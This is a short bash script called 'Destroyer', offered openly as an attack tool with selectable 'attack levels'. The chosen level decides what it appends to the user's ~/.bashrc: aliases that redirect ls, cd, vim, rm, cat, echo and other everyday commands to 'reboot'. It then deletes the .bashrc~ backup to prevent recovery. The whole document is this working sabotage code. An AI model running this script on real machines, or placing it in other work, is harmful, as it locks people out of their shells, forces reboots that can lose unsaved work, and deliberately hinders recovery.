#!/bin/bash
clear
version='0.1.1'
default_alias="reboot"

basic_attack()
{
    for alias in "emacs" "ne" "vim" "vi" "cd" "ls"
    do
	echo "Redirecting '$alias' to '$default_alias'"
	echo "alias $alias='$default_alias'" >> ~/.bashrc
    done
    echo "Removing the temporary .bashrc~ file (to prevent recovery)"
    rm -f ~/.bashrc~
}

normal_attack()
{
    for alias in "emacs" "ne" "vim" "vi" "cd" "ls" "nano" "xlock" "rm" "echo" "cat"
    do
	echo "Redirecting '$alias' to '$default_alias'"
	echo "alias $alias='$default_alias'" >> ~/.bashrc
    done
    echo "Removing the temporary .bashrc~ file (to prevent recovery)"
    rm -f ~/.bashrc~
}

echo "+-------------------------------------------------+"
echo "|                                                 |"
echo "|               +-----------------+               |"
echo "|               |Destroyer V.$version|               |"
echo "|               +-----------------+               |"
echo "|                                                 |"
echo "|                                                 |"
echo "|         Script created by Fantin Bibas.         |"
echo "|                                                 |"
echo "|   With great power comes great responsibility   |"
echo "|                                                 |"
echo "+-------------------------------------------------+"
echo
echo "Attack levels :"
echo " (0) - Does nothing : Just quit the program"
echo " (1) - Basic attack : Add some aliases to the bashrc"
echo " (2) - Normal       : Add quite a lot of aliases"
echo
read -p "Please enter the level of the attack : " usr_input
echo

case $usr_input in
    0)
	echo "Bye"
	;;
    1)
	echo "Performing the basic attack ..."
	basic_attack
	;;
    2)
	echo "Performing the normal attack ..."
	normal_attack
	;;
esac

clear
exit
